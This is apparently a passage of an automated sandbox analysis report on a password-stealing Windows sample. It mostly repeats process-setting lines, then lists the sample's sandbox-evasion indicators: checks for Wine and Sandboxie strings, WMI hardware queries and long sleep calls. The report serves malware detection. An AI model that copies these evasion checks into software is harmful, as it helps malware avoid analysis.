                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe PID: 5996, type: MEMORYSTR
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.309903707.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000B.00000002.420173402.000000000293A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.309903707.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000B.00000002.420173402.000000000293A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 6016Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -21213755684765971s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -100000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -99890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 4152Thread sleep count: 9863 > 30Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -99780s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -99666s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -99505s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -99343s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -99234s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -99123s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -99014s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -98905s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -98794s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -98686s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -98577s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -98467s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -98357s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -98249s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -98140s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -98027s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -97921s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -97810s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -97700s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -97593s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -97479s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -97368s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -97249s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -97139s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -97030s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -96921s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -96812s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -96686s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -96574s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -96452s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -96336s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -96203s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -96093s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -95984s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -95874s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -95765s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -95656s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -95546s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -95437s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -95326s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -95218s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -95109s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -94999s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -94890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -94777s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -94671s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -94559s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe TID: 344Thread sleep time: -94453s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 4908Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -100000s >= -30000sJump to behavior
